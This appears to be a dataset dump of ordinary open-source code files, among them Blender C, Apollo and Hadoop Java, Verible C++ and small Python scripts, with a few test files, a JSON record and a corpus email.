Dataset columns: max_stars_count (int64, 301 to 224k), text (string, lengths 6 to 1.05M), token_count (int64, 3 to 727k). Each row below lists its max_stars_count, the file text, and its token_count.
365
/* * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * * The Original Code is Copyright (C) 2020 Blender Foundation. * All rights reserved. */ /** \file * \ingroup bke */ #include "multires_reshape.h" #include <string.h> #include "BLI_utildefines.h" #include "BKE_ccg.h" #include "BKE_subdiv_ccg.h" bool multires_reshape_assign_final_coords_from_ccg(const MultiresReshapeContext *reshape_context, struct SubdivCCG *subdiv_ccg) { CCGKey reshape_level_key; BKE_subdiv_ccg_key(&reshape_level_key, subdiv_ccg, reshape_context->reshape.level); const int reshape_grid_size = reshape_context->reshape.grid_size; const float reshape_grid_size_1_inv = 1.0f / (((float)reshape_grid_size) - 1.0f); int num_grids = subdiv_ccg->num_grids; for (int grid_index = 0; grid_index < num_grids; ++grid_index) { CCGElem *ccg_grid = subdiv_ccg->grids[grid_index]; for (int y = 0; y < reshape_grid_size; ++y) { const float v = (float)y * reshape_grid_size_1_inv; for (int x = 0; x < reshape_grid_size; ++x) { const float u = (float)x * reshape_grid_size_1_inv; GridCoord grid_coord; grid_coord.grid_index = grid_index; grid_coord.u = u; grid_coord.v = v; ReshapeGridElement grid_element = multires_reshape_grid_element_for_grid_coord( reshape_context, &grid_coord); BLI_assert(grid_element.displacement != NULL); memcpy(grid_element.displacement, CCG_grid_elem_co(&reshape_level_key, ccg_grid, x, y), sizeof(float[3])); /* NOTE: The sculpt mode might have SubdivCCG's data out of sync from what is stored in * the original object. This happens upon the following scenario: * * - User enters sculpt mode of the default cube object. * - Sculpt mode creates new `layer` * - User does some strokes. * - User used undo until sculpt mode is exited. * * In an ideal world the sculpt mode will take care of keeping CustomData and CCG layers in * sync by doing proper pushes to a local sculpt undo stack. * * Since the proper solution needs time to be implemented, consider the target object * the source of truth of which data layers are to be updated during reshape. This means, * for example, that if the undo system says object does not have paint mask layer, it is * not to be updated. * * This is a fragile logic, and is only working correctly because the code path is only * used by sculpt changes. In other use cases the code might not catch inconsistency and * silently do wrong decision. */ /* NOTE: There is a known bug in Undo code that results in first Sculpt step * after a Memfile one to never be undone (see T83806). This might be the root cause of * this inconsistency. */ if (reshape_level_key.has_mask && grid_element.mask != NULL) { *grid_element.mask = *CCG_grid_elem_mask(&reshape_level_key, ccg_grid, x, y); } } } } return true; }
1,456
3,002
package com.apollographql.apollo; import com.apollographql.apollo.api.Response; import com.apollographql.apollo.api.Subscription; import com.apollographql.apollo.exception.ApolloCanceledException; import com.apollographql.apollo.exception.ApolloException; import com.apollographql.apollo.internal.util.Cancelable; import org.jetbrains.annotations.NotNull; /** * <p>{@code ApolloSubscriptionCall} is an abstraction for a request that has been prepared for subscription. * <code>ApolloSubscriptionCall<code/> cannot be executed twice, though it can be cancelled. Any updates pushed by * server related to provided subscription will be notified via {@link Callback}</p> * * <p>In order to execute the request again, call the {@link ApolloSubscriptionCall#clone()} method which creates a new * {@code ApolloSubscriptionCall} object.</p> */ public interface ApolloSubscriptionCall<T> extends Cancelable { /** * Sends {@link Subscription} to the subscription server and starts listening for the pushed updates. To cancel this * subscription call use {@link #cancel()}. * * @param callback which will handle the subscription updates or a failure exception. * @throws ApolloCanceledException when the call has already been canceled * @throws IllegalStateException when the call has already been executed */ void execute(@NotNull Callback<T> callback); /** * Creates a new, identical call to this one which can be executed even if this call has already been. * * @return The cloned {@code ApolloSubscriptionCall} object. */ ApolloSubscriptionCall<T> clone(); /** * Sets the cache policy for response/request cache. * * @param cachePolicy {@link CachePolicy} to set * @return {@link ApolloSubscriptionCall} with the provided {@link CachePolicy} */ @NotNull ApolloSubscriptionCall<T> cachePolicy(@NotNull CachePolicy cachePolicy); /** * Factory for creating {@link ApolloSubscriptionCall} calls. */ interface Factory { /** * Creates and prepares a new {@link ApolloSubscriptionCall} call. * * @param subscription to be sent to the subscription server to start listening pushed updates * @return prepared {@link ApolloSubscriptionCall} call to be executed */ <D extends Subscription.Data, T, V extends Subscription.Variables> ApolloSubscriptionCall<T> subscribe( @NotNull Subscription<D, T, V> subscription); } /** * Subscription normalized cache policy. */ enum CachePolicy { /** * Signals the apollo subscription client to bypass normalized cache. Fetch GraphQL response from the network only and don't cache it. */ NO_CACHE, /** * Signals the apollo subscription client to fetch the GraphQL response from the network only and cache it to normalized cache. */ NETWORK_ONLY, /** * Signals the apollo subscription client to first fetch the GraphQL response from the cache, then fetch it from network. */ CACHE_AND_NETWORK } /** * Communicates responses from a subscription server. */ interface Callback<T> { /** * Gets called when GraphQL response is received and parsed successfully. This may be called multiple times. {@link * #onCompleted()} will be called after the final call to onResponse. * * @param response the GraphQL response */ void onResponse(@NotNull Response<T> response); /** * Gets called when an unexpected exception occurs while creating the request or processing the response. Will be * called at most one time. It is considered a terminal event. After called, neither {@link #onResponse(Response)} * or {@link #onCompleted()} will be called again. 
*/ void onFailure(@NotNull ApolloException e); /** * Gets called when final GraphQL response is received. It is considered a terminal event. */ void onCompleted(); /** * Gets called when GraphQL subscription server connection is closed unexpectedly. It is considered to re-try * the subscription later. */ void onTerminated(); /** * Gets called when GraphQL subscription server connection is opened. */ void onConnected(); } }
1,256
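A minimal sketch of a Callback implementation against the ApolloSubscriptionCall interface above; the class name and log messages are illustrative only and are not part of apollo-android.

import com.apollographql.apollo.ApolloSubscriptionCall;
import com.apollographql.apollo.api.Response;
import com.apollographql.apollo.exception.ApolloException;
import org.jetbrains.annotations.NotNull;

// Hypothetical logging callback: onResponse may fire many times; onFailure and
// onCompleted are terminal; onTerminated signals the connection dropped.
public class LoggingSubscriptionCallback<T> implements ApolloSubscriptionCall.Callback<T> {
  @Override public void onResponse(@NotNull Response<T> response) {
    System.out.println("subscription update received");
  }
  @Override public void onFailure(@NotNull ApolloException e) {
    e.printStackTrace(); // terminal: no further onResponse/onCompleted calls
  }
  @Override public void onCompleted() {
    System.out.println("final response received");
  }
  @Override public void onTerminated() {
    System.out.println("connection closed unexpectedly; consider re-subscribing");
  }
  @Override public void onConnected() {
    System.out.println("connected to subscription server");
  }
}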
345
# lfs imports
from lfs.checkout.settings import CHECKOUT_TYPE_ANON
from lfs.core.utils import get_default_shop

from django.conf import settings


def main(request):
    """context processor for lfs """
    shop = get_default_shop(request)
    return {
        "SHOP": shop,
        "ANON_ONLY": shop.checkout_type == CHECKOUT_TYPE_ANON,
        "LFS_DOCS": settings.LFS_DOCS,
    }
160
612
<filename>parse/src/test/java/com/parse/ParseTextUtilsTest.java
/*
 * Copyright (c) 2015-present, Parse, LLC.
 * All rights reserved.
 *
 * This source code is licensed under the BSD-style license found in the
 * LICENSE file in the root directory of this source tree. An additional grant
 * of patent rights can be found in the PATENTS file in the same directory.
 */
package com.parse;

import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;

import java.util.Arrays;
import java.util.Collections;
import org.junit.Test;

public class ParseTextUtilsTest {

  // region testJoin

  @Test
  public void testJoinMultipleItems() {
    String joined = ParseTextUtils.join(",", Arrays.asList("one", "two", "three"));
    assertEquals("one,two,three", joined);
  }

  @Test
  public void testJoinSingleItem() {
    String joined = ParseTextUtils.join(",", Collections.singletonList("one"));
    assertEquals("one", joined);
  }

  // endregion

  // region testIsEmpty

  @Test
  public void testEmptyStringIsEmpty() {
    assertTrue(ParseTextUtils.isEmpty(""));
  }

  @Test
  public void testNullStringIsEmpty() {
    assertTrue(ParseTextUtils.isEmpty(null));
  }

  @Test
  public void testStringIsNotEmpty() {
    assertFalse(ParseTextUtils.isEmpty("not empty"));
  }

  // endregion

  // region testEquals

  @Test
  public void testEqualsNull() {
    assertTrue(ParseTextUtils.equals(null, null));
  }

  @Test
  public void testNotEqualsNull() {
    assertFalse(ParseTextUtils.equals("not null", null));
    assertFalse(ParseTextUtils.equals(null, "not null"));
  }

  @Test
  public void testEqualsString() {
    String same = "Hello, world!";
    assertTrue(ParseTextUtils.equals(same, same));
    assertTrue(ParseTextUtils.equals(same, same + "")); // Hack to compare different instances
  }

  @Test
  public void testNotEqualsString() {
    assertFalse(ParseTextUtils.equals("grantland", "nlutsenko"));
  }

  // endregion
}
803
1,189
<reponame>serkan-korkut-oss-test/opentelemetry-java
/*
 * Copyright The OpenTelemetry Authors
 * SPDX-License-Identifier: Apache-2.0
 */

package io.opentelemetry.sdk.resources;

import static org.assertj.core.api.Assertions.assertThat;

import io.opentelemetry.sdk.autoconfigure.OpenTelemetryResourceAutoConfiguration;
import io.opentelemetry.semconv.resource.attributes.ResourceAttributes;
import org.junit.jupiter.api.Test;

class ResourceDisabledByPropertyTest {

  @Test
  void osAndProcessDisabled() {
    Resource resource = OpenTelemetryResourceAutoConfiguration.configureResource();
    assertThat(resource.getAttribute(ResourceAttributes.OS_TYPE)).isNull();
    assertThat(resource.getAttribute(ResourceAttributes.PROCESS_PID)).isNull();
    assertThat(resource.getAttribute(ResourceAttributes.PROCESS_RUNTIME_NAME)).isNotNull();
  }
}
266
359
package com.github.thomasdarimont.keycloak.eventlistener.kafka;

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerConfig;
import org.apache.kafka.common.serialization.StringSerializer;

import java.util.Map;
import java.util.Properties;

public final class KafkaProducerFactory {

    private KafkaProducerFactory() {
        // prevent instantiation
    }

    public static Producer<String, String> createProducer(String clientId, String bootstrapServer,
                                                          Map<String, Object> optionalProperties) {
        Properties props = new Properties();
        props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, bootstrapServer);
        props.put(ProducerConfig.CLIENT_ID_CONFIG, clientId);
        props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName());
        props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName());
        props.putAll(optionalProperties);

        // fix Class org.apache.kafka.common.serialization.StringSerializer could not be
        // found. see https://stackoverflow.com/a/50981469
        ClassLoader tcl = Thread.currentThread().getContextClassLoader();
        try {
            Thread.currentThread().setContextClassLoader(null);
            return new KafkaProducer<>(props);
        } finally {
            Thread.currentThread().setContextClassLoader(tcl);
        }
    }
}
547
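A hedged usage sketch for the KafkaProducerFactory above; the client id, broker address, topic name, and payload are placeholder values.

import java.util.Collections;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;
import com.github.thomasdarimont.keycloak.eventlistener.kafka.KafkaProducerFactory;

public class KafkaProducerFactoryDemo {
  public static void main(String[] args) {
    // All connection details here are placeholders, not values from the source.
    Producer<String, String> producer = KafkaProducerFactory.createProducer(
        "keycloak-events", "localhost:9092", Collections.emptyMap());
    try {
      // Send a single string record and make sure it is flushed before exit.
      producer.send(new ProducerRecord<>("admin-events", "event-id", "{\"type\":\"LOGIN\"}"));
      producer.flush();
    } finally {
      producer.close();
    }
  }
}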
1,346
<gh_stars>1000+
def build_version(base, branch):
    version = '.'.join([str(x) for x in base])
    if branch == 'master':
        return version
    return version + '-' + branch
69
841
package org.jboss.resteasy.test.cdi.basic.resource;

import jakarta.ejb.Local;
import jakarta.ejb.Timeout;
import jakarta.ejb.Timer;
import jakarta.ws.rs.core.Response;

@Local
public interface OutOfBandResourceIntf {

    Response scheduleTimer();

    Response testTimer() throws InterruptedException;

    @Timeout
    void timeout(Timer timer);
}
119
1,738
<filename>dev/Code/Sandbox/Editor/Include/IDataBaseManager.h /* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ // Original file Copyright Crytek GMBH or its affiliates, used under license. #ifndef CRYINCLUDE_EDITOR_INCLUDE_IDATABASEMANAGER_H #define CRYINCLUDE_EDITOR_INCLUDE_IDATABASEMANAGER_H #pragma once struct IDataBaseItem; struct IDataBaseLibrary; enum EDataBaseItemEvent { EDB_ITEM_EVENT_ADD, EDB_ITEM_EVENT_DELETE, EDB_ITEM_EVENT_CHANGED, EDB_ITEM_EVENT_SELECTED, EDB_ITEM_EVENT_UPDATE_PROPERTIES, EDB_ITEM_EVENT_UPDATE_PROPERTIES_NO_EDITOR_REFRESH }; ////////////////////////////////////////////////////////////////////////// // Description: // Callback class to intercept item creation and deletion events. ////////////////////////////////////////////////////////////////////////// struct IDataBaseManagerListener { virtual void OnDataBaseItemEvent(IDataBaseItem* pItem, EDataBaseItemEvent event) = 0; }; ////////////////////////////////////////////////////////////////////////// // Description: // his interface is used to enumerate al items registered to the database manager. ////////////////////////////////////////////////////////////////////////// struct IDataBaseItemEnumerator { virtual ~IDataBaseItemEnumerator() = default; virtual void Release() = 0; virtual IDataBaseItem* GetFirst() = 0; virtual IDataBaseItem* GetNext() = 0; }; ////////////////////////////////////////////////////////////////////////// // // Interface to the collection of all items or specific type // in data base libraries. // ////////////////////////////////////////////////////////////////////////// struct IDataBaseManager { //! Clear all libraries. virtual void ClearAll() = 0; ////////////////////////////////////////////////////////////////////////// // Library items. ////////////////////////////////////////////////////////////////////////// //! Make a new item in specified library. virtual IDataBaseItem* CreateItem(IDataBaseLibrary* pLibrary) = 0; //! Delete item from library and manager. virtual void DeleteItem(IDataBaseItem* pItem) = 0; //! Find Item by its GUID. virtual IDataBaseItem* FindItem(REFGUID guid) const = 0; virtual IDataBaseItem* FindItemByName(const QString& fullItemName) = 0; virtual IDataBaseItemEnumerator* GetItemEnumerator() = 0; // Select one item in DB. virtual void SetSelectedItem(IDataBaseItem* pItem) = 0; ////////////////////////////////////////////////////////////////////////// // Libraries. ////////////////////////////////////////////////////////////////////////// //! Add Item library. Set isLevelLibrary to true if its the "level" library which gets saved inside the level virtual IDataBaseLibrary* AddLibrary(const QString& library, bool isLevelLibrary = false, bool bIsLoading = true) = 0; virtual void DeleteLibrary(const QString& library, bool forceDeleteLibrary = false) = 0; //! Get number of libraries. virtual int GetLibraryCount() const = 0; //! Get Item library by index. virtual IDataBaseLibrary* GetLibrary(int index) const = 0; //! Find Items Library by name. 
virtual IDataBaseLibrary* FindLibrary(const QString& library) = 0; //! Load Items library. #ifdef LoadLibrary #undef LoadLibrary #endif virtual IDataBaseLibrary* LoadLibrary(const QString& filename, bool bReload = false) = 0; //! Save all modified libraries. virtual void SaveAllLibs() = 0; //! Serialize property manager. virtual void Serialize(XmlNodeRef& node, bool bLoading) = 0; //! Export items to game. virtual void Export(XmlNodeRef& node) {}; //! Returns unique name base on input name. virtual QString MakeUniqueItemName(const QString& name, const QString& libName = "") = 0; virtual QString MakeFullItemName(IDataBaseLibrary* pLibrary, const QString& group, const QString& itemName) = 0; //! Root node where this library will be saved. virtual QString GetRootNodeName() = 0; //! Path to libraries in this manager. virtual QString GetLibsPath() = 0; ////////////////////////////////////////////////////////////////////////// //! Validate library items for errors. virtual void Validate() = 0; // Description: // Collects names of all resource files used by managed items. // Arguments: // resources - Structure where all filenames are collected. virtual void GatherUsedResources(CUsedResources& resources) = 0; ////////////////////////////////////////////////////////////////////////// // Register listeners. virtual void AddListener(IDataBaseManagerListener* pListener) = 0; virtual void RemoveListener(IDataBaseManagerListener* pListener) = 0; }; #endif // CRYINCLUDE_EDITOR_INCLUDE_IDATABASEMANAGER_H
1,525
348
<reponame>chamberone/Leaflet.PixiOverlay {"nom":"Champigny-lès-Langres","circ":"1ère circonscription","dpt":"Haute-Marne","inscrits":313,"abs":144,"votants":169,"blancs":15,"nuls":10,"exp":144,"res":[{"nuance":"REM","nom":"<NAME>","voix":98},{"nuance":"LR","nom":"<NAME>","voix":46}]}
117
3,976
<gh_stars>1000+
#coding=utf-8
import os
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont

path = os.path.split(os.path.realpath(__file__))[0]
src = path+"/img.jpg"
dst = path+"/res.jpg"

s = Image.open(src)
D = ImageDraw.Draw(s)
w,h = s.size
D.text((w-100,0), u"4", font=ImageFont.truetype(os.path.split(path)[0]+"/public/msyh_3.ttf",100),fill = (255,0,0))
s.save(dst)
178
487
<gh_stars>100-1000 // Copyright 2017-2020 The Verible Authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "verilog/CST/seq_block.h" #include "common/text/concrete_syntax_leaf.h" #include "common/text/concrete_syntax_tree.h" #include "common/text/symbol.h" #include "common/text/syntax_tree_context.h" #include "common/text/tree_utils.h" #include "verilog/CST/identifier.h" #include "verilog/CST/verilog_nonterminals.h" #include "verilog/parser/verilog_token_enum.h" namespace verilog { using verible::Symbol; using verible::SyntaxTreeContext; using verible::SyntaxTreeNode; using verible::TokenInfo; // kLabel could be prefix "label :" or suffix ": label". Handle both cases. static const verible::SyntaxTreeLeaf& GetLabelLeafText(const Symbol& label) { const auto& node = CheckSymbolAsNode(label, NodeEnum::kLabel); CHECK_EQ(node.children().size(), 2); if (node.children().front()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, ':'}) { return verible::SymbolCastToLeaf(*node.children().back()); } CHECK((node.children().back()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, ':'})); // in verilog.y, a prefix label could be an unqualified_id (to avoid grammar // conflicts), so descend to the leftmost leaf. return verible::SymbolCastToLeaf( *ABSL_DIE_IF_NULL(verible::GetLeftmostLeaf(*node.children().front()))); } // Return tehe optional label node from a kBegin node. // In verilog.y, kBegin is constructed one of two ways: // begin : label (shaped as [begin [: label]]) // label : begin (shaped as [[label :] begin]) static const SyntaxTreeNode* GetBeginLabel(const Symbol& begin) { const auto& node = CheckSymbolAsNode(begin, NodeEnum::kBegin); CHECK_EQ(node.children().size(), 2); if (node.children().front()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, verilog_tokentype::TK_begin}) { return verible::CheckOptionalSymbolAsNode(node.children().back().get(), NodeEnum::kLabel); } CHECK((node.children().back()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, verilog_tokentype::TK_begin})); return verible::CheckOptionalSymbolAsNode(node.children().front().get(), NodeEnum::kLabel); } static const SyntaxTreeNode* GetEndLabel(const Symbol& end) { const auto* label = verible::GetSubtreeAsSymbol(end, NodeEnum::kEnd, 1); if (label == nullptr) return nullptr; return verible::CheckOptionalSymbolAsNode(label, NodeEnum::kLabel); } const TokenInfo* GetBeginLabelTokenInfo(const Symbol& symbol) { const SyntaxTreeNode* label = GetBeginLabel(symbol); if (label == nullptr) return nullptr; return &GetLabelLeafText(*label).get(); } const TokenInfo* GetEndLabelTokenInfo(const Symbol& symbol) { const SyntaxTreeNode* label = GetEndLabel(symbol); if (label == nullptr) return nullptr; return &GetLabelLeafText(*label).get(); } const Symbol* GetMatchingEnd(const Symbol& symbol, const SyntaxTreeContext& context) { CHECK_EQ(NodeEnum(symbol.Tag().tag), NodeEnum::kBegin); return context.top().children().back().get(); } } // namespace verilog
1,403
14,425
<filename>hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FsShell.java /** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.fs; import java.io.IOException; import java.io.PrintStream; import java.util.ArrayList; import java.util.Arrays; import java.util.LinkedList; import org.apache.hadoop.classification.InterfaceAudience; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.conf.Configured; import org.apache.hadoop.fs.shell.Command; import org.apache.hadoop.fs.shell.CommandFactory; import org.apache.hadoop.fs.shell.FsCommand; import org.apache.hadoop.security.UserGroupInformation; import org.apache.hadoop.tools.TableListing; import org.apache.hadoop.tracing.TraceUtils; import org.apache.hadoop.util.StringUtils; import org.apache.hadoop.util.Tool; import org.apache.hadoop.util.ToolRunner; import org.apache.hadoop.tracing.TraceScope; import org.apache.hadoop.tracing.Tracer; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** Provide command line access to a FileSystem. */ @InterfaceAudience.Private public class FsShell extends Configured implements Tool { static final Logger LOG = LoggerFactory.getLogger(FsShell.class); private static final int MAX_LINE_WIDTH = 80; private FileSystem fs; private Trash trash; private Help help; protected CommandFactory commandFactory; private final String usagePrefix = "Usage: hadoop fs [generic options]"; static final String SHELL_HTRACE_PREFIX = "fs.shell.htrace."; /** * Default ctor with no configuration. Be sure to invoke * {@link #setConf(Configuration)} with a valid configuration prior * to running commands. */ public FsShell() { this(null); } /** * Construct a FsShell with the given configuration. Commands can be * executed via {@link #run(String[])} * @param conf the hadoop configuration */ public FsShell(Configuration conf) { super(conf); } protected FileSystem getFS() throws IOException { if (fs == null) { fs = FileSystem.get(getConf()); } return fs; } protected Trash getTrash() throws IOException { if (this.trash == null) { this.trash = new Trash(getConf()); } return this.trash; } protected Help getHelp() throws IOException { if (this.help == null){ this.help = new Help(); } return this.help; } protected void init() { getConf().setQuietMode(true); UserGroupInformation.setConfiguration(getConf()); if (commandFactory == null) { commandFactory = new CommandFactory(getConf()); commandFactory.addObject(new Help(), "-help"); commandFactory.addObject(new Usage(), "-usage"); registerCommands(commandFactory); } } protected void registerCommands(CommandFactory factory) { // TODO: DFSAdmin subclasses FsShell so need to protect the command // registration. 
This class should morph into a base class for // commands, and then this method can be abstract if (this.getClass().equals(FsShell.class)) { factory.registerCommands(FsCommand.class); } } /** * Returns the Trash object associated with this shell. * @return Path to the trash * @throws IOException upon error */ public Path getCurrentTrashDir() throws IOException { return getTrash().getCurrentTrashDir(); } /** * Returns the current trash location for the path specified * @param path to be deleted * @return path to the trash * @throws IOException */ public Path getCurrentTrashDir(Path path) throws IOException { return getTrash().getCurrentTrashDir(path); } protected String getUsagePrefix() { return usagePrefix; } // NOTE: Usage/Help are inner classes to allow access to outer methods // that access commandFactory /** * Display help for commands with their short usage and long description. */ protected class Usage extends FsCommand { public static final String NAME = "usage"; public static final String USAGE = "[cmd ...]"; public static final String DESCRIPTION = "Displays the usage for given command or all commands if none " + "is specified."; @Override protected void processRawArguments(LinkedList<String> args) { if (args.isEmpty()) { printUsage(System.out); } else { for (String arg : args) printUsage(System.out, arg); } } } /** * Displays short usage of commands sans the long description */ protected class Help extends FsCommand { public static final String NAME = "help"; public static final String USAGE = "[cmd ...]"; public static final String DESCRIPTION = "Displays help for given command or all commands if none " + "is specified."; @Override protected void processRawArguments(LinkedList<String> args) { if (args.isEmpty()) { printHelp(System.out); } else { for (String arg : args) printHelp(System.out, arg); } } } /* * The following are helper methods for getInfo(). They are defined * outside of the scope of the Help/Usage class because the run() method * needs to invoke them too. 
*/ // print all usages private void printUsage(PrintStream out) { printInfo(out, null, false); } // print one usage private void printUsage(PrintStream out, String cmd) { printInfo(out, cmd, false); } // print all helps private void printHelp(PrintStream out) { printInfo(out, null, true); } // print one help private void printHelp(PrintStream out, String cmd) { printInfo(out, cmd, true); } private void printInfo(PrintStream out, String cmd, boolean showHelp) { if (cmd != null) { // display help or usage for one command Command instance = commandFactory.getInstance("-" + cmd); if (instance == null) { throw new UnknownCommandException(cmd); } if (showHelp) { printInstanceHelp(out, instance); } else { printInstanceUsage(out, instance); } } else { // display help or usage for all commands out.println(getUsagePrefix()); // display list of short usages ArrayList<Command> instances = new ArrayList<Command>(); for (String name : commandFactory.getNames()) { Command instance = commandFactory.getInstance(name); if (!instance.isDeprecated()) { out.println("\t[" + instance.getUsage() + "]"); instances.add(instance); } } // display long descriptions for each command if (showHelp) { for (Command instance : instances) { out.println(); printInstanceHelp(out, instance); } } out.println(); ToolRunner.printGenericCommandUsage(out); } } private void printInstanceUsage(PrintStream out, Command instance) { out.println(getUsagePrefix() + " " + instance.getUsage()); } private void printInstanceHelp(PrintStream out, Command instance) { out.println(instance.getUsage() + " :"); TableListing listing = null; final String prefix = " "; for (String line : instance.getDescription().split("\n")) { if (line.matches("^[ \t]*[-<].*$")) { String[] segments = line.split(":"); if (segments.length == 2) { if (listing == null) { listing = createOptionTableListing(); } listing.addRow(segments[0].trim(), segments[1].trim()); continue; } } // Normal literal description. if (listing != null) { for (String listingLine : listing.toString().split("\n")) { out.println(prefix + listingLine); } listing = null; } for (String descLine : StringUtils.wrap( line, MAX_LINE_WIDTH, "\n", true).split("\n")) { out.println(prefix + descLine); } } if (listing != null) { for (String listingLine : listing.toString().split("\n")) { out.println(prefix + listingLine); } } } // Creates a two-row table, the first row is for the command line option, // the second row is for the option description. private TableListing createOptionTableListing() { return new TableListing.Builder().addField("").addField("", true) .wrapWidth(MAX_LINE_WIDTH).build(); } /** * run */ @Override public int run(String[] argv) { // initialize FsShell init(); Tracer tracer = new Tracer.Builder("FsShell"). conf(TraceUtils.wrapHadoopConf(SHELL_HTRACE_PREFIX, getConf())). 
build(); int exitCode = -1; if (argv.length < 1) { printUsage(System.err); } else { String cmd = argv[0]; Command instance = null; try { instance = commandFactory.getInstance(cmd); if (instance == null) { throw new UnknownCommandException(); } TraceScope scope = tracer.newScope(instance.getCommandName()); if (scope.getSpan() != null) { String args = StringUtils.join(" ", argv); if (args.length() > 2048) { args = args.substring(0, 2048); } scope.getSpan().addKVAnnotation("args", args); } try { exitCode = instance.run(Arrays.copyOfRange(argv, 1, argv.length)); } finally { scope.close(); } } catch (IllegalArgumentException e) { if (e.getMessage() == null) { displayError(cmd, "Null exception message"); e.printStackTrace(System.err); } else { displayError(cmd, e.getLocalizedMessage()); } printUsage(System.err); if (instance != null) { printInstanceUsage(System.err, instance); } } catch (Exception e) { // instance.run catches IOE, so something is REALLY wrong if here LOG.debug("Error", e); displayError(cmd, "Fatal internal error"); e.printStackTrace(System.err); } } tracer.close(); return exitCode; } private void displayError(String cmd, String message) { for (String line : message.split("\n")) { System.err.println(cmd + ": " + line); if (cmd.charAt(0) != '-') { Command instance = null; instance = commandFactory.getInstance("-" + cmd); if (instance != null) { System.err.println("Did you mean -" + cmd + "? This command " + "begins with a dash."); } } } } /** * Performs any necessary cleanup * @throws IOException upon error */ public void close() throws IOException { if (fs != null) { fs.close(); fs = null; } } /** * main() has some simple utility methods * @param argv the command and its arguments * @throws Exception upon error */ public static void main(String argv[]) throws Exception { FsShell shell = newShellInstance(); Configuration conf = new Configuration(); conf.setQuietMode(false); shell.setConf(conf); int res; try { res = ToolRunner.run(shell, argv); } finally { shell.close(); } System.exit(res); } // TODO: this should be abstract in a base class protected static FsShell newShellInstance() { return new FsShell(); } /** * The default ctor signals that the command being executed does not exist, * while other ctor signals that a specific command does not exist. The * latter is used by commands that process other commands, ex. -usage/-help */ @SuppressWarnings("serial") static class UnknownCommandException extends IllegalArgumentException { private final String cmd; UnknownCommandException() { this(null); } UnknownCommandException(String cmd) { this.cmd = cmd; } @Override public String getMessage() { return ((cmd != null) ? "`"+cmd+"': " : "") + "Unknown command"; } } }
4,633
3,428
<reponame>ghalimi/stdlib {"id":"01902","group":"easy-ham-1","checksum":{"type":"MD5","value":"7911c2c7f6b6f3ca8ecf8fc35df8aa28"},"text":"From <EMAIL> Thu Sep 26 11:02:56 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: y<EMAIL>ass<EMAIL>int.org\nReceived: from localhost (jalapeno [127.0.0.1])\n\tby jmason.org (Postfix) with ESMTP id 0F37216F03\n\tfor <jm@localhost>; Thu, 26 Sep 2002 11:02:56 +0100 (IST)\nReceived: from jalapeno [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Thu, 26 Sep 2002 11:02:56 +0100 (IST)\nReceived: from dogma.slashnull.org (localhost [127.0.0.1]) by\n dogma.slashnull.org (8.11.6/8.11.6) with ESMTP id g8Q81UC06455 for\n <<EMAIL>>; Thu, 26 Sep 2002 09:01:30 +0100\nMessage-Id: <<EMAIL>>\nTo: yyyy<EMAIL>int.org\nFrom: scripting <<EMAIL>>\nSubject: Jeremy Bowers: \"None of the trackback mechanisms has reached the\n critical m\nDate: Thu, 26 Sep 2002 08:01:30 -0000\nContent-Type: text/plain; encoding=utf-8\n\nURL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:12:19AM\nDate: Wed, 25 Sep 2002 12:12:19 GMT\n\n<NAME>[1]: \"None of the trackback mechanisms has reached the critical \nmass necessary to see the negative effects experienced in all other community \nmodels.\"\n\n[1] http://www.jerf.org/irights/2002/09/25.html#a2231\n\n\n"}
543
303
